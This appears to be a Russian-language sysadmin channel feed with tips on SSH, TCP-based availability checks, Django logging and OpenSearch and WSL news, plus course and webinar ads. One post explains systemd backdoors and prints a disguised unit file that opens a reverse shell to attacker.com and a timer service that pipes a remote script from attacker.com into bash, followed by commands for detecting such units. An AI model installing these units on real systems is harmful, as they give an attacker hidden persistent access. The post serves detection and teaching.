Admin Guides | Сисадмин

Ускоряем SSH: как избавиться от задержки в 3 секунды

Вы заходите на сервер по SSH, и перед тем как появится приглашение ввести пароль — пауза. Иногда целых 2–5 секунд. Почему так?

Виновник — GSSAPIAuthentication.
SSH по умолчанию пытается авторизоваться через Kerberos (GSSAPI), даже если вы им не пользуетесь.

Это особенно заметно, если DNS или обратное имя хоста не настроены идеально. В итоге клиент ждёт ответа, которого не будет.

Как решить:

1️⃣Отключите на клиенте (вашем компьютере):
Откройте или создайте файл ~/.ssh/config и добавьте:

Host *
    GSSAPIAuthentication no

2️⃣Хотите на сервере — можно и так:
Файл /etc/ssh/sshd_config, найдите строку:

GSSAPIAuthentication yes

и замените на:

GSSAPIAuthentication no

После чего:

sudo systemctl restart sshd

Merion Academy – раздает пользу. У них на образовательной платформе есть целый раздел с бесплатными уроками по DevOps, Сетям, Программированию C#, Python, Java, Кибербезопу, Сетевому безопу, Этичному Хакингу, куча вебинаров и других полезностей – все они доступны бесплатно.

Лайфхак в том, что даже если вы не их ученик – т.е. не платили за курсы, доступ можно получить абсолютно бесплатно, схема рабочая:

1. По ссылке регаем новый аккаунт
2. Получаем доступ к платформе
3. Залезаем в раздел "Плюшки от Merion"
4. Выбираем понравившееся и получаем пользу

Пинг без ICMP: как проверить доступность, если всё закрыто

Когда вы работаете с инфраструктурой, где ICMP-запросы блокируются (например, корпоративные фаерволы, жесткие политики безопасности или хостинг-провайдеры), привычный ping перестаёт быть полезным.

Но проверка доступности хоста или сервиса по-прежнему нужна. Что делать?

Альтернативы ICMP-пингу:
1️⃣TCP ping через nmap, nc или telnet — подключаемся к порту:

nc -zv 192.168.0.1 22

или

nmap -p 80 192.168.0.1

2️⃣curl или wget — если работает HTTP(S), можно проверить ответ сервиса:

curl -Is http://example.com | head -n 1

3️⃣hping3 — мощный инструмент для TCP/UDP/ICMP-проверок с возможностью задать порты и заголовки вручную:

hping3 -S -p 80 example.com

4️⃣fping — массовый ping, умеет работать и без ICMP при нужных флагах.
5️⃣PowerShell (для Windows-серверов):

Test-NetConnection -ComputerName example.com -Port 443

▶️ БЕСПЛАТНЫЙ МАСТЕР-КЛАСС «Linux: от основ к профессиональному использованию»

14 мая в 19:00 (МСК) | Онлайн | Бесплатно
✔️Регистрация

Linux уже давно перестал быть инструментом исключительно для системных администраторов. Сегодня это необходимый навык для DevOps-инженеров, специалистов по кибербезопасности и всех, кто работает с IT-инфраструктурой.  

На нашем вебинаре мы:
▪️ Развеем мифы о сложности Linux и покажем, как начать работать с ним уверенно
▪️ Продемонстрируем практическое применение в реальных рабочих задачах
▪️ Расскажем о карьерных перспективах для специалистов, владеющих Linux
▪️ Дадим пошаговый алгоритм освоения системы

Особое внимание уделим:
✔ Работе с терминалом (основные команды и их применение)
✔ Решению типовых задач системного администрирования
✔ Возможностям для профессионального роста
 
Ведущий: Дмитрий Семьянов — действующий специалист по пентесту, куратор курса «Основы Linux».

Не пропустите! Регистрация здесь.
🚀 Трудности с регистрацией? Пишите @Codeby_Academy

Пишем журналы в Django.
Часть 2

Вы настроили ведение логов в Django и теперь хотите увидеть, как это работает в действии?

Давайте добавим простую домашнюю страницу и настроим журналирование каждого её посещения.

Когда пользователь заходит на главную, мы выводим «Hello FreeCodeCamp.org Reader :)», а в лог warning.log записываем, что кто-то заходил на страницу и когда именно.

1️⃣Создаём проект и виртуальное окружение

mkdir django-logging-tutorial
cd django-logging-tutorial
python3 -m venv venv
source venv/bin/activate

2️⃣Устанавливаем Django

pip install django

3️⃣Создаём проект и приложение

django-admin startproject django_logging_tutorial .
python manage.py startapp logging_example

4️⃣Добавляем приложение в INSTALLED_APPS

Откройте settings.py и добавьте 'logging_example', в список приложений:

INSTALLED_APPS = [
    ...
    'logging_example',
]

5️⃣Добавляем конфигурацию логирования в settings.py

(Если ещё не добавляли)

LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'file': {
            'level': 'WARNING',
            'class': 'logging.FileHandler',
            'filename': 'logs/warning.log',
        },
    },
    'loggers': {
        'django': {
            'handlers': ['file'],
            'level': 'WARNING',
            'propagate': True,
        },
    },
}

Создайте папку logs:

mkdir logs

6️⃣Пишем код логирования

views.py в приложении logging_example:

from django.http import HttpResponse
import datetime
import logging

logger = logging.getLogger(__name__)

def hello_reader(request):
    logger.warning('Homepage was accessed at ' + str(datetime.datetime.now()) + ' hours!')
    return HttpResponse("<h1>Hello FreeCodeCamp.org Reader :)</h1>")

7️⃣Настраиваем маршруты

В urls.py основного проекта:

from django.contrib import admin
from django.urls import path
from logging_example import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.hello_reader, name="hello_reader")
]

8️⃣Запуск и тестирование

Запустите сервер разработки:

python manage.py runserver

Откройте в браузере http://127.0.0.1:8000/ и несколько раз обновите страницу. Затем проверьте файл logs/warning.log. Там появится что-то вроде:

Homepage was accessed at 2025-05-07 22:38:29.922510 hours!
Homepage was accessed at 2025-05-07 22:48:35.088296 hours!

🤖 Вебинар для IT | Встраиваем чат-ботов в мессенджер Труконф

💬 Если задача повторяется больше двух раз — пришло время писать бота!

В среду 14 мая в 11:00 мск разберём, как добавить чат-ботов в корпоративный мессенджер с помощью нового инструмента — TrueConf Chatbot Connector.

Что можно реализовать быстро и без лишней боли:

✔️ Интеграцию с GPT-моделями и помощниками
✔️ Автоотправку сообщений в чаты
✔️ Персональные оповещения в личных сообщениях для пользователей
✔️ Интеграцию мессенджера с ИТ-системами вашей компании
✔️ Модерацию групповых чатов
✔️ Информирование администратора о статусе работы TrueConf Server
✔️ И многое другое.

Присоединяйтесь, будет live-coding, но без «у меня всё сломалось» (мы тестили).

👤 Ведущие — директор по маркетингу Лев Якупов и старший технический писатель Антон Бааджи.

🔔 Когда: 14 мая 2025 в 11:00 мск

🔗 Регистрация по ссылке

Релиз OpenSearch 3.0: что нового?

OpenSearch 3.0 — свежий релиз проекта от OpenSearch Software Foundation под крылом Linux Foundation. Это форк Elasticsearch и Kibana, созданный в 2021 году после перехода Elastic на несвободную лицензию.

Проект активно развивают Amazon, SAP, Uber, Canonical и другие, а код распространяется под Apache 2.0.

Что нового в 3.0:
⏺Векторный движок с поддержкой GPU: ускорение поиска и интеграция с LLM (LangChain, OpenAI и др.).
⏺Оптимизация хранения векторов: до 30 раз быстрее холодный старт, меньше места.
⏺Поддержка gRPC: передача данных быстрее и с меньшими накладными расходами.
⏺Подключение потоков: прямой pull из Kafka и Kinesis.
⏺Разделение трафика: чтение и запись теперь можно разнести.
⏺PPL и Calcite: расширенные SQL-возможности.
⏺Автоопределение типов индексов: улучшено логирование.
⏺Lucene 10 и Java 21: новая производительность, модульность, параллелизм, +25–75% в скорости на тестах.

Проект остаётся опенсорсной альтернативой Elasticsearch с фокусом на расширяемость и интеграции с ML/AI.

Ведение журналов в Django: как отлаживать проект, не лезя в консоль

Единственный совершенный код — это код, который так и не написали. А если вы его всё-таки написали — будьте готовы отлаживать.

Чтобы не разбираться с ошибками “на глаз”, используйте логирование: это ваша чёрная коробка, в которую пишет всё, что происходит в приложении.

Django уже поставляется с поддержкой логирования через стандартный модуль logging, и настроить его можно за 5 минут. Главное — понимать, что и зачем вы пишете в логи.

Что такое логирование в Python?

Это механизм для записи сообщений об ошибках, предупреждениях, событиях и внутренних действиях системы. Он позволяет:
• понимать, что пошло не так и где это произошло;
• воспроизводить баги;
• видеть поведение фоновых задач, сигналов, миграций, API-запросов.

4 ключевых компонента системы логов Django:

1️⃣Logger — точка входа. Вызываете logger.warning("Что-то пошло не так").
2️⃣Handler — указывает, куда писать: в файл, на консоль, в e-mail.
3️⃣Filter — фильтрует сообщения по условиям: уровень, модуль, пользователь.
4️⃣Formatter — форматирует вывод: добавляет timestamp, уровень, текст и т.п.

Пример настройки логов в settings.py:

LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,

    'handlers': {
        'file': {
            'level': 'WARNING',
            'class': 'logging.FileHandler',
            'filename': BASE_DIR / 'warning.log',
        },
    },

    'loggers': {
        '': {
            'handlers': ['file'],
            'level': 'WARNING',
            'propagate': True,
        },
    },
}

Этот код отправляет все WARNING и выше в warning.log.
Хочется видеть критические ошибки на почте? Добавьте AdminEmailHandler.
Хотите писать SQL-запросы в лог? Подключите django.db.backends.

Где это реально помогает:
⏺debug фоновых задач Celery, которые отвалились без трейсбека;
⏺отладка middleware и ранних исключений;
⏺логирование пользовательских действий, если нет Sentry;
⏺поиск редких ошибок в проде, которые не воспроизводятся на локалке.

Backdoor в systemd: нестандартные юниты и что туда могут спрятать

В продакшене всё чаще встречаются случаи, когда вредонос не сидит в /etc/rc.local, crontab или .bashrc, а встраивается прямо в systemd. Причём аккуратно, с видом “службы мониторинга” или “агента безопасности”.

Разбираем, как через systemd можно спрятать обратную оболочку или исполнять вредоносный код по расписанию — и как это обнаружить.

1. Маскировка reverse shell под systemd-сервис

Простой пример unit-файла, запускающего обратную оболочку:

[Unit]
Description=System Health Monitor

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Restart=always

[Install]
WantedBy=multi-user.target

Такой юнит можно сохранить в /etc/systemd/system/sys-health.service и активировать через systemctl enable --now sys-health.service. На глаз — просто очередная служба.

2. Распределённый запуск через таймер

Юниты можно запускать не постоянно, а по расписанию, как cron:

# /etc/systemd/system/collect.timer
[Unit]
Description=Collect stats timer

[Timer]
OnBootSec=5min
OnUnitActiveSec=6h
Unit=collect.service

[Install]
WantedBy=timers.target

# /etc/systemd/system/collect.service
[Unit]
Description=Run data collector

[Service]
ExecStart=/usr/bin/curl -s http://attacker.com/payload.sh | bash

Такой таймер будет запускать бекдор раз в 6 часов — и его легко упустить, особенно если не смотрите systemctl list-timers.

3. Примеры более изощрённого поведения

Некоторые вредоносы:
• подсовывают юниты в ~/.config/systemd/user/, чтобы не требовать root-доступа;
• используют бинарники с нейтральными названиями (/usr/local/bin/kworker или /opt/metricsd);
• пишут логи в /dev/null или ExecStartPre=/bin/sleep 60, чтобы избежать подозрений по таймингу.

4. Как искать такие юниты
⏺systemctl list-units --type=service --all — ищем странные описания и пути к исполняемым файлам.
⏺systemctl cat <unit> — посмотреть полный юнит.
⏺find /etc/systemd/ /lib/systemd/ ~/.config/systemd/ -name "*.service" — ручной обход.
⏺Проверка таймеров: systemctl list-timers --all.

Fedora Linux 42 теперь официально в WSL

Microsoft добавила Fedora Linux 42 в список официально поддерживаемых дистрибутивов WSL (Windows Subsystem for Linux).

Если вы на Windows 11 с WSL2 — достаточно одной команды:

wsl --install FedoraLinux-42

Запуск:

wsl -d FedoraLinux-42

Fedora 42 можно использовать как полноценную рабочую среду: внутри — GNOME 48, KDE Plasma 6.3, ядро 6.14, GCC 15, PHP 8.4, Ruby 3.4, Ansible 11 и многое другое. Работает на x86_64, ARM64 и даже Power64.

Microsoft уже добавила GUI-интерфейс для управления дистрибутивами в WSL и продолжает развивать поддержку графических приложений прямо внутри Fedora.

Теперь можно обойтись без двойной загрузки или VM — всё внутри Windows.